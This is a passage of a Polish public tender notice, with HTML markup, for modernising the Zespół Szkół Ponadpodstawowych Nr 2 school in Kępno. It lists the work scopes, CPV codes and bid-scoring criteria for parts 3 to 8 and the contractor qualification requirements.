Główny kod CPV: <span class="normal">45331220-4 - Instalowanie urządzeń klimatyzacyjnych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45331220-4 - Instalowanie urządzeń klimatyzacyjnych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">11 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria oceny ofert<br/><br/>Oferty będą oceniane w następujący sposób:<br/>1) cena oferty (brutto) Waga 60 % <br/> A<br/>	C = *100 pkt x 60%<br/> X<br/>gdzie:<br/> C – liczba punktów oferty<br/>	A – najniższa cena brutto ze złożonych ofert<br/> X – cena ocenianej oferty brutto<br/>2) Okres gwarancji jakości – waga 40%. Wykonawca może otrzymać maksymalnie 20 punktów i tak:<br/>Za okres gwarancji obejmujący 36 – miesięcy - 0 pkt<br/>Za okres gwarancji obejmujący 42 – miesięcy - 10 pkt<br/>Za okres gwarancji obejmujący 48 – miesięcy - 20 pkt<br/>Za okres gwarancji obejmujący 54 – miesięcy - 30 pkt<br/>Za okres gwarancji obejmujący 60 – miesięcy – 40 pkt<br/> <br/>Liczba punktów wyliczona zgodnie ze wzorem: P= C+G <br/>gdzie:<br/>P- suma punktów wg przyjętych kryteriów <br/>C- liczba punków za kryterium cena<br/>G- liczba punktów za kryterium okres gwarancji <br/>Za najkorzystniejszą zostanie wybrana oferta, która zgodnie z powyższymi kryteriami oceny ofert uzyska najwyższą liczbę punktów spośród ofert nie podlegających odrzuceniu<br/><br/>Oferta na każdą cześć oceniana będzie odrębnie.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część/Zadanie Nr 4 Wykonanie Instalacji fotowoltaicznej w budynku głównym Zespołu Szkół Ponadpodstawowych Nr 2 w Kępnie ul. Przemysłowa 10c zakres robót:<br/>Montaż instalacji fotowoltaicznej o mocy 5kW na potrzeby C.W.U.W ramach zadania przewidziano również prace przygotowawcze i odtworzeniowe.<br/>Wykonanie: montażu obudowy podtynkowej ppoż., linii kablowej do wyłącznika ppoz., montaż rozdzielni R-PV i UPS , linii kablowej od RP do inwentera, modernizacja instalacji odgromowej na potrzeby instalacji fotowoltaicznej, instalacji połączeń wyrównawczych . montaż rozdzielni R-DC1 RDC2 ,kablowanie DC , montaż konstrukcji wsporczych pod panele , montaż paneli fotowoltaicznych, montaż inwenterów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09332000-5 - Instalacje słoneczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria oceny ofert<br/><br/>Oferty będą oceniane w następujący sposób:<br/>1) cena oferty (brutto) Waga 60 % <br/> A<br/>	C = *100 pkt x 60%<br/> X<br/>gdzie:<br/> C – liczba punktów oferty<br/>	A – najniższa cena brutto ze złożonych ofert<br/> X – cena ocenianej oferty brutto<br/>2) Okres gwarancji jakości – waga 40%. Wykonawca może otrzymać maksymalnie 20 punktów i tak:<br/>Za okres gwarancji obejmujący 36 – miesięcy - 0 pkt<br/>Za okres gwarancji obejmujący 42 – miesięcy - 10 pkt<br/>Za okres gwarancji obejmujący 48 – miesięcy - 20 pkt<br/>Za okres gwarancji obejmujący 54 – miesięcy - 30 pkt<br/>Za okres gwarancji obejmujący 60 – miesięcy – 40 pkt<br/> <br/>Liczba punktów wyliczona zgodnie ze wzorem: P= C+G <br/>gdzie:<br/>P- suma punktów wg przyjętych kryteriów <br/>C- liczba punków za kryterium cena<br/>G- liczba punktów za kryterium okres gwarancji <br/>Za najkorzystniejszą zostanie wybrana oferta, która zgodnie z powyższymi kryteriami oceny ofert uzyska najwyższą liczbę punktów spośród ofert nie podlegających odrzuceniu<br/><br/>Oferta na każdą cześć oceniana będzie odrębnie.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część/ Zadanie Nr 5 Modernizacja instalacji zimnej i cieplej wody i modernizacja instalacji co w budynku głównym Zespołu Szkół Ponadpodstawowych Nr 2 w Kępnie ul. Przemysłowa 10c, zakres robót . <br/>1)Modernizacja systemu ciepłej wody użytkowej polegająca na wymianie istniejącego źródła ciepła na powietrzną pompę ciepła. Zainstalowane urządzenie będzie charakteryzować się obowiązującym do końca 2020 minimalnym poziomem efektywności energetycznej i normami emisji zanieczyszczeń które zostały określone w środkach wykonawczych do dyrektywy 2009/125/WE z dnia 21 października 2009 ustanawiającej ogólne zasady ustalania wymogów dotyczących ekoprojektu dla produktów związanych z energią .<br/>2)Montaż instalacji cieplej wody użytkowej wraz z cyrkulacją. Przewody izolowane termiczne ,<br/>3) Kompleksowa modernizacja instalacji centralnego ogrzewania polegająca na wymianie instalacji CO oraz grzejników wraz z montażem zaworów termoregulacyjnych z zakresem proporcjonalności P-1K.W ramach zadania przewidziano również prace przygotowawcze i odtworzeniowe </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45332200-5 - Roboty instalacyjne hydrauliczne</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria oceny ofert<br/><br/>Oferty będą oceniane w następujący sposób:<br/>1) cena oferty (brutto) Waga 60 % <br/> A<br/>	C = *100 pkt x 60%<br/> X<br/>gdzie:<br/> C – liczba punktów oferty<br/>	A – najniższa cena brutto ze złożonych ofert<br/> X – cena ocenianej oferty brutto<br/>2) Okres gwarancji jakości – waga 40%. Wykonawca może otrzymać maksymalnie 20 punktów i tak:<br/>Za okres gwarancji obejmujący 36 – miesięcy - 0 pkt<br/>Za okres gwarancji obejmujący 42 – miesięcy - 10 pkt<br/>Za okres gwarancji obejmujący 48 – miesięcy - 20 pkt<br/>Za okres gwarancji obejmujący 54 – miesięcy - 30 pkt<br/>Za okres gwarancji obejmujący 60 – miesięcy – 40 pkt<br/> <br/>Liczba punktów wyliczona zgodnie ze wzorem: P= C+G <br/>gdzie:<br/>P- suma punktów wg przyjętych kryteriów <br/>C- liczba punków za kryterium cena<br/>G- liczba punktów za kryterium okres gwarancji <br/>Za najkorzystniejszą zostanie wybrana oferta, która zgodnie z powyższymi kryteriami oceny ofert uzyska najwyższą liczbę punktów spośród ofert nie podlegających odrzuceniu<br/><br/>Oferta na każdą cześć oceniana będzie odrębnie.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część/Zadanie Nr 6 Modernizacja instalacji elektrycznej w głównym Zespołu Szkół Ponadpodstawowych Nr 2 w Kępnie ul. Przemysłowa 10c, zakres robót:<br/>Montaż rozdzielnicy RG szkoły i rozdzielnic TB1,Wykonanie instalacji oświetlenia i gniazd wtykowych, Wykonanie pomiarów elektrycznych powykonawczych </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45310000-3 - Roboty instalacyjne elektryczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">11 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria oceny ofert<br/><br/>Oferty będą oceniane w następujący sposób:<br/>1) cena oferty (brutto) Waga 60 % <br/> A<br/>	C = *100 pkt x 60%<br/> X<br/>gdzie:<br/> C – liczba punktów oferty<br/>	A – najniższa cena brutto ze złożonych ofert<br/> X – cena ocenianej oferty brutto<br/>2) Okres gwarancji jakości – waga 40%. Wykonawca może otrzymać maksymalnie 20 punktów i tak:<br/>Za okres gwarancji obejmujący 36 – miesięcy - 0 pkt<br/>Za okres gwarancji obejmujący 42 – miesięcy - 10 pkt<br/>Za okres gwarancji obejmujący 48 – miesięcy - 20 pkt<br/>Za okres gwarancji obejmujący 54 – miesięcy - 30 pkt<br/>Za okres gwarancji obejmujący 60 – miesięcy – 40 pkt<br/> <br/>Liczba punktów wyliczona zgodnie ze wzorem: P= C+G <br/>gdzie:<br/>P- suma punktów wg przyjętych kryteriów <br/>C- liczba punków za kryterium cena<br/>G- liczba punktów za kryterium okres gwarancji <br/>Za najkorzystniejszą zostanie wybrana oferta, która zgodnie z powyższymi kryteriami oceny ofert uzyska najwyższą liczbę punktów spośród ofert nie podlegających odrzuceniu<br/><br/>Oferta na każdą cześć oceniana będzie odrębnie.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część/Zadanie Nr 7 Modernizacja instalacji klimatyzacji w głównym Zespołu Szkół Ponadpodstawowych Nr 2 w Kępnie ul. Przemysłowa 10c<br/>Wykonanie: systemu instalacji klimatyzacji VRF, instalacji rurociągów chłodniczych ,instalacji odprowadzenia skroplin, roboty budowlane </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45331220-4 - Instalowanie urządzeń klimatyzacyjnych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">11 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria oceny ofert<br/><br/>Oferty będą oceniane w następujący sposób:<br/>1) cena oferty (brutto) Waga 60 % <br/> A<br/>	C = *100 pkt x 60%<br/> X<br/>gdzie:<br/> C – liczba punktów oferty<br/>	A – najniższa cena brutto ze złożonych ofert<br/> X – cena ocenianej oferty brutto<br/>2) Okres gwarancji jakości – waga 40%. Wykonawca może otrzymać maksymalnie 20 punktów i tak:<br/>Za okres gwarancji obejmujący 36 – miesięcy - 0 pkt<br/>Za okres gwarancji obejmujący 42 – miesięcy - 10 pkt<br/>Za okres gwarancji obejmujący 48 – miesięcy - 20 pkt<br/>Za okres gwarancji obejmujący 54 – miesięcy - 30 pkt<br/>Za okres gwarancji obejmujący 60 – miesięcy – 40 pkt<br/> <br/>Liczba punktów wyliczona zgodnie ze wzorem: P= C+G <br/>gdzie:<br/>P- suma punktów wg przyjętych kryteriów <br/>C- liczba punków za kryterium cena<br/>G- liczba punktów za kryterium okres gwarancji <br/>Za najkorzystniejszą zostanie wybrana oferta, która zgodnie z powyższymi kryteriami oceny ofert uzyska najwyższą liczbę punktów spośród ofert nie podlegających odrzuceniu<br/><br/>Oferta na każdą cześć oceniana będzie odrębnie.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część/Zadanie Nr 8 Wykonanie termomodernizacji budynkuZespołu Szkół Ponadpodstawowych Nr 2 w Kępnie ul. Przemysłowa 10czakres robot :<br/>Modernizacja stropochachu polegająca na dociepleniu styropapą o gr. 25 cm -powierzchnia docieplenia 650,00 m2.Styropapa o współczynniku lambda=0,038W/mK. W ramach zadania przewidziano również prace przygotowawcze i odtworzeniowe </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45321000-3 - Izolacja cieplna</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria oceny ofert<br/><br/>Oferty będą oceniane w następujący sposób:<br/>1) cena oferty (brutto) Waga 60 % <br/> A<br/>	C = *100 pkt x 60%<br/> X<br/>gdzie:<br/> C – liczba punktów oferty<br/>	A – najniższa cena brutto ze złożonych ofert<br/> X – cena ocenianej oferty brutto<br/>2) Okres gwarancji jakości – waga 40%. Wykonawca może otrzymać maksymalnie 20 punktów i tak:<br/>Za okres gwarancji obejmujący 36 – miesięcy - 0 pkt<br/>Za okres gwarancji obejmujący 42 – miesięcy - 10 pkt<br/>Za okres gwarancji obejmujący 48 – miesięcy - 20 pkt<br/>Za okres gwarancji obejmujący 54 – miesięcy - 30 pkt<br/>Za okres gwarancji obejmujący 60 – miesięcy – 40 pkt<br/> <br/>Liczba punktów wyliczona zgodnie ze wzorem: P= C+G <br/>gdzie:<br/>P- suma punktów wg przyjętych kryteriów <br/>C- liczba punków za kryterium cena<br/>G- liczba punktów za kryterium okres gwarancji <br/>Za najkorzystniejszą zostanie wybrana oferta, która zgodnie z powyższymi kryteriami oceny ofert uzyska najwyższą liczbę punktów spośród ofert nie podlegających odrzuceniu<br/><br/>Oferta na każdą cześć oceniana będzie odrębnie.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: nie podlegają wykluczeniu (na zasadach określonych w Rozdziale VII SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniania warunki dotyczące: <br/>1) zdolności do występowaniu w obrocie gospodarczym <br/>Zamawiający nie stawia warunku w powyższym zakresie;<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów –<br/>Zamawiający nie stawia warunku w powyższym zakresie;<br/>3) sytuacji ekonomicznej lub finansowej <br/>Zamawiający nie stawia warunku w powyższym zakresie; <br/>4) zdolności technicznej lub zawodowej: <br/>a) Warunek ten w zakresie doświadczenia zostanie uznany za spełniony , jeżeli Wykonawca wykaże, ze w okresie ostatnich 5 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności gospodarczej jest krótszy - w tym okresie, wykonał należycie:<br/>W przypadku składania oferty na Część ( Zadanie )Nr 1 zamówienia:<br/>Wykonanie co najmniej od 1-2 robót budowlanych polegające na wykonaniu robót budowlanych z zakresie termomodernizacji budynku użyteczności publicznej lub innego budynku na kwotę co najmniej 1.000.000,00 zł brutto słownie ( jeden milion złotych 00/100) które zostały wykonane w sposób należyty, w tym zgodnie z przepisami prawa budowlanego i prawidłowo ukończone. (Załącznik Nr 4 do SWZ)<br/>W przypadku składania oferty na Część (Zadanie) Nr 3 zamówienia:<br/>Wykonanie co najmniej od 1-2 robót budowlanych polegające na wykonaniu robót budowlanych w zakresie instalacji klimatyzacji w budynku użyteczności publicznej lub innym budynku na kwotę co najmniej 500.000,00 zł brutto słownie ( pięćset tysięcy złotych 00/100). które zostały wykonane w sposób należyty, w tym zgodnie z przepisami prawa budowlanego i prawidłowo ukończone. (Załącznik Nr 4 do SWZ)<br/>W przypadku składania oferty na Część (Zadanie) Nr 6 zamówienia:<br/>Wykonanie co najmniej od 1-2 robót budowlanych polegające na wykonaniu robót budowlanych w zakresie modernizacji instalacji elektrycznej w budynku użyteczności publicznej lub innym budynku na kwotę co najmniej 300.000,00 zł brutto słownie ( trzysta tysięcy złotych 00/100) które zostały wykonane w sposób należyty, w tym zgodnie z przepisami prawa budow-lanego i prawidłowo ukończone. (Załącznik Nr 4 do SWZ)<br/>W przypadku składania oferty na Część (Zadanie)Nr 7 zamówienia:<br/>Wykonanie co najmniej od 1-2 robót budowlanych polegające na wykonaniu robót budowlanych w zakresie instalacji klimatyzacji w budynku użyteczności publicznej lub innym budynku na kwotę co najmniej 100.000,00 zł brutto słownie ( sto tysięcy złotych 00/100) które zostały wykonane w sposób należyty, w tym zgodnie z przepisami prawa budowlanego i prawidłowo ukończone. (Załącznik Nr 4 do SWZ)<br/>W przypadku składania oferty na Część (Zadanie)Nr 8 zamówienia:<br/>Wykonanie co najmniej od 1-2 robót budowlanych polegające na wykonaniu robót budowlanych w zakresie termomodernizacji w budynku użyteczności publicznej lub innym budynku na kwotę co najmniej 200.000,00 zł brutto słownie ( dwieście tysięcy złotych 00/100) które zostały wykonane w sposób należyty, w tym zgodnie z przepisami prawa budowlanego i prawidłowo ukończone. (Załącznik Nr 4 do SWZ)<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia powyższy warunek Wykonawcy musza spełnić łącznie. <br/>b) Warunek ten w zakresie osób skierowanych przez wykonawcę do realizacji zamówienia zostanie uznany za spełniony jeżeli Wykonawca wykaże iż dysponuje przy realizacji niniejszego zamówienia osobami niezbędnymi do realizacji zamówienia [które będą nadzorowały realizację zamówienia] uprawnionymi do sprawowania samodzielnych funkcji technicznych w budownictwie w zakresie wykonawczym w specjalnościach niezbędnych do wykonania robót określonych w niniejszej SWZ. Na tej podstawie Wykonawca przedstawi w wykazie osoby legitymujące się kwalifikacjami odpowiednimi do funkcji wymienionych poniżej:<br/>W przypadku składania oferty na Część (Zadanie)Nr 1 zamówienia: <br/>kierownik budowy pełniący funkcję koordynatora wszystkich prac z uprawnieniami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej (lub odpowiadające równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów), posiadający co najmniej 5 letnie doświadczenie w kierowaniu robotami budowlanymi jako kierownik budowy/ kierownik robót budowlanych.<br/>kierownik robót sanitarnych – wymagania z uprawnieniami budowlanymi do kierowania robotami w specjalności instalacyj-nej w zakresie sieci instalacji i urządzeń: cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń posiadający, co najmniej 2 lata doświadczenia w kierowaniu robotami instalacyjnymi jako kierownik budowy/ kierownik robót sanitarnych,.<br/>kierownik robót elektrycznych – wymagania z uprawnieniami budowlanymi do kierowania robotami <br/>w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń, posiadający, co najmniej 2 lata doświadczenia w kierowaniu robotami instalacyjnymi jako kierownik budowy, kierownik robót zakresie robót elektrycznych i elektroenergetycznych.<br/>W przypadku składania oferty na Część (Zadanie)Nr 2 zamówienia:<br/>kierownik robót sanitarnych – wymagania z uprawnieniami budowlanymi do kierowania robotami w specjalności instalacyj-nej w zakresie sieci instalacji i urządzeń: cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń posiadający, co najmniej 2 lata doświadczenia w kierowaniu robotami instalacyjnymi jako kierownik budowy/ kierownik robót sanitarnych,.<br/>W przypadku składania oferty na Część (Zadanie)Nr 3 zamówienia:<br/>kierownik robót sanitarnych – wymagania z uprawnieniami budowlanymi do kierowania robotami w specjalności instalacyj-nej w zakresie sieci instalacji i urządzeń: cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń posiadający, co najmniej 2 lata doświadczenia w kierowaniu robotami instalacyjnymi jako kierownik budowy/ kierownik robót sanitarnych,.<br/>W przypadku składania oferty na Część (Zadanie)Nr 4 zamówienia:<br/>kierownik robót elektrycznych – wymagania z uprawnieniami budowlanymi do kierowania robotami <br/>w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń, posiadający, co najmniej 2 lata doświadczenia w kierowaniu robotami instalacyjnymi jako kierownik budowy, kierownik robót zakresie robót elektrycznych i elektroenergetycznych.<br/>W przypadku składania oferty na Część (Zadanie)Nr 5 zamówienia:<br/>kierownik robót sanitarnych – wymagania z uprawnieniami budowlanymi do kierowania robotami w specjalności instalacyj-nej w zakresie sieci instalacji i urządzeń: cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń posiadający, co najmniej 2 lata doświadczenia w kierowaniu robotami instalacyjnymi jako kierownik budowy/ kierownik robót sanitarnych,.<br/>W przypadku składania oferty na Część (Zadanie)Nr 6 zamówienia<br/>kierownik robót elektrycznych – wymagania z uprawnieniami budowlanymi do kierowania robotami <br/>w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń, posiadający, co najmniej 2 lata doświadczenia w kierowaniu robotami instalacyjnymi jako kierownik budowy, kierownik robót zakresie robót 